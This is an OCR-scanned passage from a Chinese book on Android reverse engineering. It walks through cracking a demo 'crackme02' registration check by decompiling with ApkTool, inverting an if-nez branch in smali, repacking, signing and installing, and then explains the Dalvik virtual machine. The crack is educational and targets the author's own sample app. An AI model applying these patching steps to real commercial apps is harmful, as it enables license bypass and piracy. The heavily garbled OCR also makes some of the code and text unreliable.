public void onClick(View v) ( 
if (!checkSN(edit userName.getText().toString().trim(), 
edit sn.getText().toString().trim())) { 
Toast .makeText (MainActivity.this, // 弹 出 无 效用 户 名 或 注册 码 提示 
R.string.unsuccessed, Toast.LENGTH SHORT).show(); 
) else ( 
Toast.makeText (MainActivity.this, /7 弹出 注册 成 功 提示 
R.string.successed, Toast.LENGTH SHORT).show(); 
btn register.setEnabled(false); 
setTitle(R.string.registered);  // 模 拟 程序 已 注册 


2.1.2 ”编译 生成 APK 文 件 


首先 启动 Android 程 序 运行 环境 ， 然 后 在 crackme02 工 程 上 点 击 右键 ， 在 
弹出 的 菜单 中 选择 “Run As Android Application”， 如 果 工 程 没有 任何 错 
误 ，Eclipse 会 根据 默认 配置 编译 并 启动 crackme02 程 序 。 可 以 通过 菜单 项 
“Run As > Run Configuration” 更 改 默认 的 局 动 配置 选项 ， 如 程序 启动 的 第 一 
个 Activity、Android 平 台 的 版 本 等 。 


注意 
Android 程 序 运行 环境 可 以 使 用 真实 Android 设 备 或 Android 模 拟 器 ， 如 果 读 者 手 上 没有 Android 设 
备 。 可 以 按照 本 书 1.2.7 节 讲解 步骤 创建 模拟 器 ， 然 后 在 命令 行 下 输入 以 下 命令 启动 它 : 
emulator-avd «£725 & ffi > 


以 后 在 讲解 过 程 中 启动 Android 程 序 运 行 环 境 的 步骤 不 再 竟 述 。 


程序 启动 后 ， 输 入 任意 长 度 的 用 户 名 与 16 位 长 度 的 注册 码 ， 点 击 注册 
按钮 ， 程 序 会 模拟 注册 软件 的 执行 效果 ， 如 图 2-3 所 示 。 


7, WP 18:30 


Android 程 序 破 解 演示 实例 
用 户 名 : droider 


注册 码 : | asdf133asdfghkjl 


注册 


图 2-3 ”crackme02 程 序 的 运行 效果 


2.2 ”破解 第 一 个 程序 


本 节 将 以 上 一 节 编 写 的 crackme02 程 序 为 例 ， 讲 解 破 解 它 的 完整 流程 。 


2.2.1 ”如 何 动手 ? 


破解 Android 程 序 通 常 的 方法 是 将 apk 文 件 利用 ApkTool 反 编译 ， 生 成 
Smali 格 式 的 反 汇编 代码 ， 然 后 阅读 smali 文 件 的 代码 来 理解 程序 的 运行 机 
制 ， 找 到 程序 的 突破 口 进 行 修改 ， 最 后 使 用 ApkTool 重 新 编译 生成 apk 文 件 
并 签名 ， 最 后 运行 测试 ， 如 此 循环 ， 直 至 程序 被 成 功 破 解 。 

在 实际 的 分 析 过 程 中 ， 还 可 以 使 用 IDA Pro 直 接 分 析 apk 文 件 ， 或 者 
dex2jar 与 jd-gui 配 合 来 进行 Java 源 码 级 的 分 析 等 ， 这 些 分 析 方 法 会 在 本 书 的 
第 5 章 进 行 详 细 的 介绍 。 


2.2.2” 反 编译 APK 文 件 


ApkTool 是 跨 平台 的 工具 ， 可 以 在 Windows 平 台 与 Ubuntu 平台 下 直接 使 
用 。 使 用 前 到 http://code.google.com/p/android-apktool/ 下 载 ApkTool， 目 前 最 
新 版 本 为 1.4.3，Windows 平 台 需 要 下 载 apktool11.4.3.tarbz2 与 apktool-install- 
windows-r04-brut1.tar.bz2 两 个 压缩 包 ， 将 下 载 后 的 文件 解压 到 同一 目录 下 ， 
本 书 的 Windows 平 台 将 其 解压 到 “D:\tools\Android\apktool* 目 录 ， 解 压 完 成 后 
将 该 目录 添加 a 到 系统 的 PATH 环 境 变 量 中 ， 以 便 在 命令 行 下 直接 使 用 ， 如 果 
© Ubuntu 系统 则 需要 下 载 apktool1.4.3.tar.bz2 与 apktool-install-linux-r04- 
brutl.tarbz2， 本 书 的 Ubuntu 平台 将 其 解压 到 “home/feicong/tools/apktool” 目 
录 下 。 

在 Windows 平 台 下 ， 打 开 一 个 CMD 窗 口 ， 在 命令 行 下 直接 输入 apktool 
会 列 出 程序 的 用 法 。 

反 编 译 apk 文 件 的 命令 为 : apktool d[ecode] [OPTS] <file.apk> [<dir>] 

编译 apk 文 件 的 命令 为 : apktool b[uild] [OPTS] [«app path»] 
[«out file>] 

在 命令 行 下 进入 要 反 编 译 的 apk 文 件 目 录 ， 输 入 命令 : "apktool d 
crackme02.apk outdir”， 稍 等 片刻 ， 程 序 就 会 反 编 译 完 成 ， 如 图 2-4 所 示 。 


ct C: AWINDOWSXsysten32Xcnd. exe 


D: Nuorkspace*Nchapter2*2.2»apktool d crackme82.apk outdir 
I: Baksmaling... 

I: Loading resource table... 
I: Loaded. 

I: Loading resource table from file: C: Documents and Settings dministrator\apk 
tool\framework\ .apk 
I 
I 
I 
I 
I 


: Loaded. 

: Decoding file-resources... 
: Decoding valuesx/* XMLs... 
: Done. 

* Copying assets and libs... 


ID: workspace 'schapter2*2.2»? 


图 2-4 ”使 用 Apktool 反 编译 apk 文 件 


在 Ubuntu 平台 下 ， 使 用 Apktool 与 在 Windows 平 台 下 基本 相同 ， 有 具体 步 
又 读者 可 自行 实践 。 


2.2.3 ”分 析 APK 文 件 


反 编译 apk 文 件 成 功 后 ， 会 在 当前 的 outdir 目 录 下 生成 一 系列 目录 与 文 
件 。 其 中 smali 目 录 下 存放 了 程序 所 有 的 反 汇编 代码 ，res 目 录 则 是 程序 中 所 
有 的 资源 文件 ， 这 些 目录 的 子 目 录 和 文件 与 开发 时 的 源码 目录 组 织 结构 是 
一 致 的 。 

如 何 寻 找 突破 口 是 分 析 一 个 程序 的 关键 。 对 于 一 般 的 Android 来 说 ， 错 
误 提 示 信 息 通常 是 指引 关键 代码 的 风向 标 ， 在 错误 提示 附近 一 般 是 程序 的 
核心 验证 代码 ， 分 析 人 员 需 要 阅读 这 些 代 码 来 理解 软件 的 注册 流程 。 

错误 提示 是 Android 程 序 中 的 字符 串 资产， 开发 Android 程 序 时 ， 这 些 字 
符 串 可 能 硬 编码 到 源码 中 ， 也 可 能 引用 自 “res\vvalues” 目 录 下 的 strings.xml 文 
件 ，apk 文 件 在 打包 时 ，strings.xml 中 的 字符 串 被 加 密 存 储 为 resources.arsc 文 
件 保 存 到 apk 程 序 包 中 ，apk 被 成 功 反 编译 后 这 个 文件 也 被 解密 出 来 了 。 

还 记得 2.1.2 节 运行 程序 时 的 错误 提示 吗 ? 在 软件 注册 失败 时 会 Toast 弹 
出 “无 效用 户 名 或 注册 码 ”， 我 们 以 此 为 线索 来 寻找 关键 代码 。 打 开 
“res\values\string.xml” 文 件 ， 内 容 如 下 : 


<?xml version-"1.0" encoding-"utf-8"?-» 
«resources» 

«string name-"app name"»Crackme0201«/string» 
«string name-"hello world"»Hello world!«/string-» 


«string name-"menu settings"»Settings«/string-» 


«string 
«string 
«string 
«string 
«string 
«string 
«string 
«string 
«string 
«string 


«string 


name-"title activity. DE ne 
name="info">Android 程 Jig 251 HE 示 实 


name="username"> 用 户 名 : 


实例 </string> 
«/string» 
name-"sn"»jik/]fB: «/string» 
name-"register"»jit 册 </string> 
name="hint_username"> 请 输入 用 户 名 </string> 
name="hint_sn"> 请 输入 16 位 的 注册 人 码 </ string> 
name="unregister"> 程 序 未 注册 </string> 
name="registered"> 程 序 已 注册 </string> 


name=nunsuccessedn> 无 效用 户 名 或 注册 码 </stringy> 


name-"successed"»2k315! 注册 成 功 </string> 


</resources> 


开发 Android 程 序 时 ，String.xzml 文 件 中 的 所 有 字符 串 资 源 都 在 
“gen/<packagename>/R.java" 文 件 的 String 类 中 被 标识 ， 每 个 字符 串 都 有 唯一 
的 int 类 型 索引 值 ， 使 用 Apktool 反 编译 apk 文 件 后 ， 所 有 的 索引 值 保 存在 
string.xml 文 件 同 目录 下 的 public.xml 文 件 中 。 

从 上 面 列表 中 找到 “无 效用 户 名 或 注册 码 ” 的 字符 串 名 称 为 unsuccessed。 
打开 public.xml 文 件 ， 它 的 内 容 如 下 : 


<?xml version="1.0" encoding-"utf-8"?» 

«resources» 
«public type-"drawable" name-"ic launcher" id-"0x7f020001" /> 
«public type-"drawable" name-"ic action search" id-"0x7f020000" /» 
«public type-"layout" name-"activity main" id-"0x7f030000" /> 
«public type-"dimen" name-"padding small" id-"0x7f040000" /> 
«public type-"dimen" name-"padding medium" id-"0x7f040001" /> 
«public type-"dimen" name-"padding large" id-"0x7f040002" /» 
«public type-"string" name-"app name" id-"0x7f050000" /> 
«public type-"string" name-"hello world" id-"0x7f£050001" /> 
«public type-"string" name-"menu settings" id-"0x7f050002" /» 
«public type-"string" name-"title activity main" id-"0x7f050003" /> 
«public type-"string" name-"info" id-"Ox7f050004" /> 
«public type-"string" name-"username" id-"0x7f050005" /> 
«public type-"string" name-"sn" id-"0x7f050006" /> 
«public type-"string" name-"register" id-"0x7f050007" /» 
«public type-"string" name-"hint username" id-"0x7f050008" /> 
«public type-"string" name-"hint sn" id-"0x7f£050009" /> 
«public type-"string" name-"unregister" id-"0x7f05000a" /> 
«public type-"string" name-"registered" id-"0x7f05000b" /> 
«public type-"string" name-"unsuccessed" id-"0x7f05000c" /> 
«public type-"string" name-"successed" id-"0x7f05000d" /> 
«public type-"style" name-"AppTheme" id-"0x7f060000" /» 
«public type-"menu" name-"activity main" id-"0x7f070000" /> 
«public type-"id" name-"textViewl" id-"O0Ox7f080000" /> 
«public type-"id" name-"edit username" id-"0x7f080001" /> 
«public type-"id" name-"edit sn" id-"0x7f080002" /> 
«public type-"id" name-"button register" id-"0x7f£080003" /> 
«public type-"id" name-"menu settings" id-"0x7f080004" /> 


«/resources» 


unsuccessed BJ id {å 73 0x7£05000c , f£ smali El 3& FH 18 Z& & & PS y 
0x7f05000c 的 文件 ， 最 后 发 现 只 有 MainActivity$1.smali 文 件 一 处 调用 ， 代 码 
如 下 : 


# virtual methods 
.method public onClick(Landroid/view/View;)V 
.locals 4 
.parameter "v" 
.prologue 
const/4 v3, 0x0 
.line 32 
d$calls: 
Lcom/droider/crackme0201/MainActivity;-»checkSN(Ljava/lang/String; 
Ljava/lang/String;)Z 
invoke-static (v0, v1, v2), Lcom/droider/crackme0201/MainActivity;-» 
access$2 (Lcom/droider/crackme0201/MainActivity;Ljava/lang/String; 
Ljava/lang/String;)Z # 检查 注册 码 是 否 合法 
move-result v0 
if-nez v0, :cond O0 # 如 果 结 果 不 为 0， 就 跳 转 到 condq_0 标 号 处 
.line 34 
iget-object v0, p0, Lcom/droider/crackme0201/MainActivity$1;-» 
this$0:Lcom/droider/crackme0201/MainActivity; 
.line 35 
const vl, 0x7f£05000c # unsuccessed ifj 
.line 34 
invoke-static (v0, v1, v3), Landroid/widget/Toast;-» 
makeText (Landroid/content/Context;II)Landroid/widget/Toast; 
move-result-object v0 
.line 35 
invoke-virtual (v0), Landroid/widget/Toast;-»show()V 
.line 42 
:goto 0 
return-void 
.line 37 
:cond 0 


iget-object v0, p0, Lcom/droider/crackme0201/MainActivityS1;-» 
this$0:Lcom/droider/crackme0201/MainActivity; 
.line 38 
const v1, 0x7f05000d # successed f jb 
.line 37 
invoke-static (v0, vl, v3), Landroid/widget/Toast;-- 
makeText (Landroid/content/Context; II)Landroid/widget/Toast; 
move-result-object v0 
.line 38 
invoke-virtual (v0), Landroid/widget/Toast;-»-show()V 
.line 39 
iget-object v0, p0, Lcom/droider/crackme0201/MainActivity$1;-» 
this$0:Lcom/droider/crackme0201/MainActivity; 
#getter for: Lcom/droider/crackme0201/MainActivity;-»btn register:Landroid/ 
widget/Button; 
invoke-static (v0), Lcom/droider/crackme0201/MainActivity;-» 
access$3 (Lcom/droider/crackme0201/MainActivity;)Landroid/widget 
/Button; 
move-result-object v0 
invoke-virtual (v0, v3), Landroid/widget/Button;-»setEnabled(Z)V 
# 设 置 注册 按钮 不 可 用 
.line 40 
iget-object v0, p0, Lcom/droider/crackme0201/MainActivity$1;-» 
this$0:Lcom/droider/crackme0201/MainActivity; 
const vl, 0x7f05000b£ registered 字 符 串 ， 模 拟 注册 成 功 
invoke-virtual (v0, v1), Lcom/droider/crackme0201/MainActivity;-> 
setTitle(I)V 
goto :goto O0 
.end method 


Smali 代 码 中 添加 的 注释 使 用 井 号 “#” 开 头 ，“.line 32” 行 调用 了 checkSN() 
函数 进行 注册 码 的 合法 检查 ， 接 着 下 面 有 如 下 两 行 代码 : 


move-result V0 

if-nez v0, :cond O0 

checkSNOEKRZIGR[S]BooleanZ$ 2! Byf&s XERA 471 aa RR ISI B Z5 
保存 到 v0 寄 存 器 中 ， 第 二 行 代 码 对 v0 进 行 判 断 ， 如 果 v0 的 值 不 为 零 ， 即 条 
件 为 真 的 情况 下 ， 跳 转 到 cond_0 标 号 处 ， 反 之 ， 程 序 顺 利 向 下 执行 。 

如 果 代码 不 跳 转 ， 会 执行 如 下 几 行 代码 : 


.line 34 

iget-object v0, p0, Lcom/droider/crackme0201/MainActivity$1;-» 
this$0:Lcom/droider/crackme0201/MainActivity; 

.line 35 

const v1, 0x7f05000c # unsuccessed 字 符 串 

.line 34 

invoke-static (v0, vl, v3), Landroid/widget/Toast;--» 
makeText (Landroid/content/Context;II)Landroid/widget/Toast; 

move-result-object v0 

.line 35 

invoke-virtual {v0}, Landroid/widget/Toast;-»show()V 

.line 42 

:goto O0 


return-void 

* line 34” 行 使 用 iget-object 指 令 获 取 MainActivity 实 例 的 引用 。 代 码 中 的 - 
>this$0 是 内 部 类 MainActivity$1 中 的 一 个 synthetic 字 段 ， 存 储 的 是 父 类 
MainActivity 的 引用 ， 这 是 Java 语 言 的 一 个 特性 ， 类 似 的 还 有 ->access$0， 这 
一 类 代码 会 在 本 书 的 第 5 章 进行 详细 介绍 。 

* line 35” 行 将 v1 寄存 器 传 入 unsuccessed 字 符 串 的 id 值 ， 接 着 调用 Toast:- 
>makeTextO 创 建 字 符 串 ， 然 后 调用 Toast;->showOvV 方 法 弹出 提示 ， 最 后 .line 
401733] FBreturn-voidEK| 2435 [n]; 

如 果 代码 跳 转 ， 会 执行 如 下 代码 : 


:cond_0 

iget-object v0, p0, Lcom/droider/crackme0201/MainActivity$1;-» 
this$0:Lcom/droider/crackme0201/MainActivity; 

.line 38 

const vl, 0x7f05000d  # successed 字 符 串 

.line 37 

invoke-static (v0, vi, v3), Landroid/widget/Toast;-» 
makeText (Landroid/content/Context;II)Landroid/widget/Toast; 

move-result-object v0 

.line 38 

invoke-virtual (v0), Landroid/widget/Toast;-»show()V 

.line 39 

iget-object v0, p0, Lcom/droider/crackme0201/MainActivity$1;--» 
this$0:Lcom/droider/crackme0201/MainActivity; 

fgetter for: Lcom/droider/crackme0201/MainActivity;-»btn register:Landroid/ 
widget/Button; 

invoke-static (v0), Lcom/droider/crackme0201/MainActivity;-» 
access$3 (Lcom/droider/crackme0201/MainActivity;)Landroid/widget/Button; 

move-result-object v0 

invoke-virtual (v0, v3), Landroid/widget/Button;-»setEnabled(Z)V SUE 

册 按 钮 不 可 用 

.line 40 

iget-object v0, p0, Lcom/droider/crackme0201/MainActivity$1;-» 
this$0:Lcom/droider/crackme0201/MainActivity; 

const vi, 0x7f05000b # registered Pf], BU RI 

invoke-virtual (v0, vl), Lcom/droider/crackme0201/MainActivity;-»setTitle(I)V 


goto :goto O0 
这 段 代 码 的 功能 是 弹出 注册 成 功 提示 ， 也 就 是 说 ， 上 面 的 跳 转 如 果 成 
功 意味 着 程序 会 成 功 注册 。 


注意 


Smali 代 码 的 语法 与 格式 会 在 本 书 第 3 章 进行 详细 介绍 。 


2.2.4 ”修改 smali 文 件 代 码 


经 过 上 一 小 节 的 分 析 可 以 发 现 ，“.line 32” 行 的 代码 “if-nez v0, :cond_0” 
是 程序 的 破解 点 。if-nez 是 Dalvik 指 令 集 中 的 一 个 条 件 跳 转 指令 ， 类 似 的 还 


有 if-eqz、if-gez、if-lez 等 。 这 些 指令 会 在 本 书 第 3 章 进 行 介绍 ， 读 者 在 这 里 
只 需要 知道 ， 与 if-nez 指 令 功 能 相反 的 指令 为 if-eqz， 表 示 比 较 结果 为 0 或 相 
等 时 进行 跳 转 。 

用 任意 一 款 文 本 编辑 器 打开 MainActivity$1.smali 文 件 ， 将 “.line 32” 行 的 
代码 “if-nez v0, :cond_0” 修 改 为 “if-eqz v0, :cond_0”， 保 存 后 退出 ， 代 码 就 算 
修改 完成 了 。 


225 ”重新 编译 APK 文 件 并 签名 


修改 完 Smali 文 件 代码 后 ， 需 要 将 修改 后 的 文件 重新 进行 编译 打包 成 apk 
文件 。2.2.2 小 节 中 我 们 已 经 知道 编译 apk 文 件 的 命令 格式 为 “apktool b[uild] 
[OPTS] [<app_path>][<out_file>] ”， 打 开 CMD 命 令 提示 符 窗口 ， 进 入 到 
outdir 同 目录 ， 执 行 以 下 命令 。 

apktool b outdir 

不 出 意外 的 话 ， 程 序 就 会 编译 成 功 。 命 令 输出 结果 如 图 2-5 所 示 ， 编 译 
成 功 后 会 在 outdir 目 录 下 生成 dist 目 录 ， 里 面 存放 着 编译 成 功 的 apk 文 件 。 


c C: AWINDOWSVsysten32VXcnd. exe 


*TNworkspace'Nschapter2*2.2»apktool b outdir 

: Checking whether sources has changed... 

: Smaling... 

: Checking whether resources has changed... 
: Building apk file... 


?Nworkspace schapter2*2.2»5 


图 2-5 ”使 用 ApkTool 重 新 打包 Android 程 序 


编译 生成 的 crackme02.apk 没 有 签名 ， 还 不 能 安装 测试 ， 接 下 来 需要 使 
用 signapk.jar 工 具 对 apk 文 件 进 行 签名 。signapk.jar 是 Android 源 码 包 中 的 一 个 
签名 工具 。 代 码 位 于 Android 源 码 目 录 下 的 /build/tools/signapk/SignApk.java 
文件 中 ， 源 码 编译 后 可 以 在 /out/host/linuxx86/framework 目 录 中 找到 它 。 使 
用 signapk.jar 签 名 时 需要 提供 签名 文件 ， 我 们 在 此 可 以 使 用 Android 产 码 中 提 


供 的 签名 文件 testkey.pk8 5 testkey.x509.pem , "€ 1] fi F Android JF 83 BJ 
build/target/product/security 目 录 。 新 建 signapk.bat 文 件 ， 内 容 为 : 


java -jar "$-dpO0signapk.jar" "$-dpOtestkey.x509.pem" "€$-dpÜ0testkey.pk8" $1 
signed.apk 


将 signapk.jar、 signapk.bat. testkey.x509.pem、 testkeypk8 等 4 个 文件 放 
到 同一 目录 并 添加 到 系统 PATH 环境 变量 中 ， 然 后 在 命令 提示 符 下 输入 如 下 
命令 对 APK 文 件 进 行 签名 。 

signapk crackme02.apk 


签名 成 功 后 会 在 同 目录 下 生成 signed.apk 文 件 。 


2.2.6 ”安装 测试 


现在 是 时 候 测 试 修改 后 的 成 果 了 。 

启动 一 个 Android AVD ， 或 者 使 用 数据 线 连 接手 机 与 电脑 ， 然 后 在 命令 
提示 符 下 执行 以 下 命令 安装 破解 后 的 程序 。 

adb install signed.apk 

不 出 意外 会 得 到 以 下 输出 提示 : 

adb install signed.apk 

822 KB/s (39472 bytes in 0.046s) 

pkg: /data/local/tmp/signed.apk 


Success 

安装 完成 后 启动 crackme02 ， 在 用 户 名 与 注册 码 输入 框 中 输入 任意 字 
符 ， 点 击 注册 按钮 ， 程 序 会 弹出 注册 成 功 提 示 ， 并 且 标 题 栏 字 符 会 变 成 已 
注册 字样 。 如 图 2-6 所 示 。 


Android 程 序 破解 演示 实例 
Hx: droider 


注册 码 : | cracked 


5 6 7 8 9 0 


qlwlelrltlylulilolp 


图 2-6 ”测试 破解 后 的 程序 


2.3 ”本章 小 结 


本 章 通过 一 个 实例 介绍 了 Android 程 序 的 一 般 分 析 与 破解 流程 。 在 实际 
的 分 析 过 程 中 ， 接 触 到 的 代码 远 比 这 些 要 复杂 得 多 ， 有 些 代码 甚至 经 过 混 
淆 处 理 过 ， 很 难 阅 读 ， 这 样 就 需要 使 用 其 它 手段 如 动态 调试 结合 一 些 其 它 
的 技巧 来 辅助 分 析 ， 这 些 更 深入 的 内 容 会 在 本 书 的 后 续 章节 中 进行 介绍 。 


第 3 章 MEA Android Dalvik 虚 拟 机 


虽然 Android 平 台 使 用 Java 语 言 来 开发 应 用 程序 ， 但 Android 程 序 却 不 是 
运行 在 标准 Java 虚 拟 机 上 的 。 可 能 是 为 了 解决 移动 设备 上 软件 运行 效率 的 问 
题 ， 也 可 能 是 为 了 规避 与 Oracle 公 司 的 版 权 纠 纷 。Google 为 Android 平 台 
门 设计 了 一 套 虚拟 机 来 运行 Android 程 序 ， 它 就 是 Dalvik Virtual Machine 

(Dalvik AHL) 。 本 章 将 讨论 Dalvik 虚 拟 机 的 特性 及 基于 Dalvik 字 节 码 的 
汇编 语言 知识 。 


3.1 Dalvik 虚 拟 机 的 特点 
行 原理 


本 节 主 要 介绍 Dalvik 的 基本 特性 以 及 工作 原理 ， 这 对 掌握 Android 程 序 
运行 原理 尤为 重要 。 


3.1.1 Dalvik 虚 拟 机 概述 


Google 于 2007 年 底 正式 发 布 了 Android SDK，Dalvik 虚 拟 机 也 第 一 次 进 
入 了 人 们 的 视野 。 它 的 作者 是 丹 : 伯 恩 斯 坦 (Dan Bornstein) ， 名 字 来 源 于 
他 的 祖先 曾经 居住 过 的 名 叫 Dalvik 的 小 渔村 。Dalvik 虚 拟 机 作为 Android 平 台 
的 核心 组 件 ， 拥 有 如 下 几 个 特点 : 

e 体积 小 ， 占 用 内 存 空 间 小 ; 

e 专 有 的 DEX 可 执行 文件 格式 ， 体 积 更 小 ， 执 行 速度 更 快 ; 

e 常量 池 采 用 32 位 索引 值 ， 寻 址 类 方法 名 、 字 段 名 、 常 量 更 快 ; 

e 基于 寄存 器 架构 ， 并 拥有 一 套 完 整 的 指令 系统 ; 

e 提供 了 对 象 生 命 周 期 管理 、 堆 栈 管 理 、 线 程 管 理 、 安 全 和 异常 管理 
以 及 垃圾 回收 等 重要 功能 ; 


掌握 Android 程 序 的 运 


e 所 有 的 Android 程 序 都 运行 在 Android 系 统 进 程 里 ， 每 个 进程 对 应 着 
一 个 Dalvik 虚 拟 机 实例 。 


3.1.2 ”Dalvik 虚 拟 机 与 Java 虚 拟 机 的 区 别 


Dalvik 虚 拟 机 与 传统 的 Java 虚 拟 机 有 着 许多 不 同 点 ， 两 者 并 不 兼容 ， 它 
们 显著 的 不 同 点 主要 表现 在 以 下 几 个 方面 : 

1。Java 虚 拟 机 运行 的 是 Java 字 节 码 ，Dalvik 虚 拟 机 运行 的 是 Dalvik 字 
节 码 。 

传统 的 Java 程 序 经 过 编译 ， 生 成 Java 字 节 码 保存 在 class 文 件 中 ，Java 虚 
拟 机 通过 解码 class 文 件 中 的 内 容 来 运行 程序 。 而 Dalvik 虚 拟 机 运行 的 是 
Dalvik 字 节 码 ， 所 有 的 Dalvik 字 节 码 由 Java 字 节 码 转换 而 来 ， 并 被 打包 到 一 
个 DEX (Dalvik Executable) 可 执行 文件 中 。Dalvik 虚 拟 机 通过 解释 DEX 文 
件 来 执行 这 些 字 节 码 。 

2. Dalvik 可 执行 文件 体积 更 小 。 

Android SDK 中 有 一 个 叫 dx 的 工具 负责 将 Java 字 节 码 转换 为 Dalvik 字 节 
码 。dx 工 具 对 Java 类 文件 重新 排列 ， 消 除 在 类 文件 中 出 现 的 所 有 宛 余 信息 ， 
避免 虚拟 机 在 初始 化 时 出 现 反 复 的 文件 加 载 与 解析 过 程 。 一 般 情况 下 ，Java 
类 文件 中 包含 多 个 不 同 的 方法 签名 ， 如 果 其 他 的 类 文件 引用 该 类 文件 中 的 
方法 ， 方 法 签名 也 会 被 复制 到 其 类 文件 中 ， 也 就 是 说 ， 多 个 不 同 的 类 会 后 
时 包含 相同 的 方法 签名 ， 同 样 地 ， 大 量 的 字符 串 常量 在 多 个 类 文件 中 也 被 
重复 使 用 。 这 些 见 余 信息 会 直接 增加 文件 的 体积 ， 同 时 也 会 严重 影响 虚拟 
机 解析 文件 的 效率 。dx 工 具 针 对 这 个 问题 专门 做 了 处 理 ， 它 将 所 有 的 Java 类 
文件 中 的 常量 池 进 行 分 解 ， 消 除 其 中 的 元 余 信息 ， 重 新 组 合 形成 一 个 常量 
闻 ， 所 有 的 类 文件 共享 同一 个 常量 闻 。dx 工 具 的 转换 过 程 如 图 3-1 所 示 。 由 
于 dx 工具 对 常量 闻 的 压缩 ， 使 得 相同 的 字符 串 、 常 量 在 DEX 文 件 中 只 出 现 
一 次 ， 从 而 减 小 了 文件 的 体积 。 


Jar 文 件 DEXX fF 


class X fF 
constance pools | ^"  — * dex header 
Other data LI-1 89M 
—G — » string ids 
ium c I | TT > type ids 
T NN » : 
constance pools | | » proto ids 
S 
Other data — 0 » field ids 
class 文 件 | 1 | ----------- » method ids 
constance pools | " ^" ^" " 
p class def 
Other data | > 
a other data 


图 3-1 Java 文件 转换 为 DEX 文 件 


3。Java 虚 拟 机 与 Dalvik 虚 拟 机 架构 不 同 。 

Java 虚 拟 机 基于 栈 架 构 。 程 序 在 运行 时 虚拟 机 需要 频繁 的 从 栈 上 读 取 或 
写 入 数据 ， 这 个 过 程 需要 更 多 的 指令 分 派 与 内 存 访 问 次 数 ， 会 耗费 不 少 
CPU 时 间 ， 对 于 像 手 机 设备 资源 有 限 的 设备 来 说 ， 这 是 相当 大 的 一 笔 开 
销 。 

Dalvik 虚 拟 机 基于 寄存 器 架构 。 数 据 的 访问 通过 寄存 器 间 直 接 传递 ， 这 
样 的 访问 方式 比 基 于 栈 方 式 要 快 很 多 。 下 面 通 过 一 个 实例 来 对 比 一 下 Java 字 
节 码 与 Dalvik 字 节 码 的 区 别 。 测 试 代码 如 下 。 


public class Hello ( 
public int foo(int a, int b) ( 


return (a + b) * (a - b); 


public static void main(String[] argc) ( 
Hello hello - new Hello(); 
System.out.println(hello.foo(5, 3)); 


) 

将 以 上 内 容 保存 为 Hellojava。 打 开 命 令 提 示 符 ， 执 行 命令 *javac 
Hello.java" 编译 生成 Helloclass 文 件 。 然 后 执行 命令 “dx --dex -- 
output=Hello.dex Hello.class” 生 成 dex 文 件 。 

接 下 来 使 用 javap 反 编译 Hello.class 查 看 foo0 国 数 的 Java 字 节 码 ， 执 行 以 
下 命令 。 

javap -c -classpath . Hello 

命令 执行 后 得 到 如 下 代码 : 


public int foo(int, int); 


Code: 

0: iload 1 
1: iload 2 
2: iadd 

3: iload 1 
4: iload 2 
5: isub 

6: imul 

7: ireturn 


使 用 dexdump.exe 〈 位 于 Android SDK 的 platform-tools 目 录 中 ) 查看 foo() 
到 数 的 Dalvik 字 T5 , 执行 以 下 命令 。 
dexdump.exe -d Hello.dex 


命令 执行 后 整理 输出 结果 ， 可 以 得 到 如 下 代码 。 


Hello.foo:(II)I 

0000: add-int v0, v3, v4 
0002: sub-int v1, v3, v4 
0004: mul-int/2addr v0, v1 
0005: return vO 


注意 
如 果 使 用 JDK1.7 编 译 Hello.java， 生 成 的 Hello.class 默 认 的 版 本 会 比较 低 ， 使 用 dx 生成 dex 文 件 会 
提示 class 文 件 无 效 。 解 决 方法 是 强制 指定 class 文 件 的 版 本 ,执行 如 下 命令 重新 编译 。 
javac -source 1.6 -target 1.6 Hello.java 
使 用 dx 工具 编译 Hello.class 时 ， 如 果 提 示 无 法 找到 Hello.class 文 件 ， 可 以 将 Hello.class 文 件 与 dx 放 
同一 目录 后 重新 编译 。 


查看 上 面 的 Java 字 节 码 ， 发 现 foo() 冰 数 一 共 占用 了 8 个 字 节 ， 代 码 中 每 
条 措 令 占用 1 个 字 节 ， 并 且 这 些 指令 都 没有 参数 。 那 么 这 些 指令 是 如 何 存 取 
数据 的 呢 ? Java 虚 拟 机 的 指令 集 被 称 为 零 地 址 形式 的 指令 集 ， 所 谓 零 地 址 形 
式 ， 是 指 指令 的 源 参数 与 目标 参数 都 是 隐 含 的 ， 它 通过 Java 虚 拟 机 中 提供 的 
一 种 数据 结构 “ 求 值 栈 ” 来 传递 的 。 

对 于 Java 程 序 来 说 ， 每 个 线程 在 执行 时 都 有 一 个 PC 计数 器 与 一 个 Java 
栈 。PC 计 数 器 以 字 节 为 单位 记录 当前 运行 位 置 距离 方法 开头 的 偏 移 量 ， 它 
的 作用 类 似 于 ARM 架 构 CPU 的 PC 寄存 器 与 x86 架 构 CPU 的 卫 寄 存 器 ， 不 同 的 
是 PC 计数 器 只 对 当前 方法 有 效 ，Java 虚 拟 机 通过 它 的 值 来 取 指 令 执 行 。Java 
栈 用 于 记录 Java 方 法 调用 的 “活动 记录 ” (activation record) ，Java 栈 以 帧 

(frame) 为 单位 保存 线程 的 运行 状态 ， 每 调用 一 个 方法 就 会 分 配 一 个 新 的 
栈 帧 压 入 Java 栈 上 ， 每 从 一 个 方法 返回 则 弹出 并 撤销 相应 的 栈 帧 。 每 个 栈 帧 
包括 局 部 变量 区 、 求 值 栈 (JVM 规 范 中 将 其 称 为 “操作 数 栈 *) 和 其 他 一 些 
信息 。 局 部 变量 区 用 于 存储 方法 的 参数 与 局 部 变量 ， 其 中 参数 按 源码 中 从 
左 到 右 顺 序 保存 在 局 部 变量 区 开头 的 几 个 slot 中 。 求 值 栈 用 于 保存 求 值 的 中 
间 结 果 和 调用 别 的 方法 的 参数 等 ，JVM 运 行 时 它 的 状态 结构 如 图 3-2 所 示 。 


PC 计数 器 


foo() 函 数 2 
偏 移 量 助词 符 
0:  iload 1 局 部 变量 区 
1: iload 2 0 
PC— 2. iadd 1 5 
3:  iload 1 2 3 
4: iload 2 
5: isub 求 值 栈 
6: imul 
7: ireturn HI» 3 
5 


图 3-2”JVM 运 行 状态 


结合 代码 来 理解 上 面 的 理论 知识 。 由 于 每 条 指令 占用 一 个 字 节 空间 ， 
foo0 国 数 Java 字 节 码 左边 的 偏 移 量 就 是 程序 执行 到 每 一 行 代 码 时 PC 的 值 ， 
并 且 Java 虚 拟 机 最 多 只 支持 0xff 条 指令 。 第 1 条 指令 iload_1 可 分 成 两 部 分 : 
第 一 部 分 为 下 划 线 左边 的 iload， 它 属于 JVM (Java 虚 拟 机 ) 指令 集中 load 系 
列 中 的 一 条 ，i 是 指令 前 级 ， 表 示 操 作 类 型 为 int 类 型 ，load 表 示 将 局 部 变量 
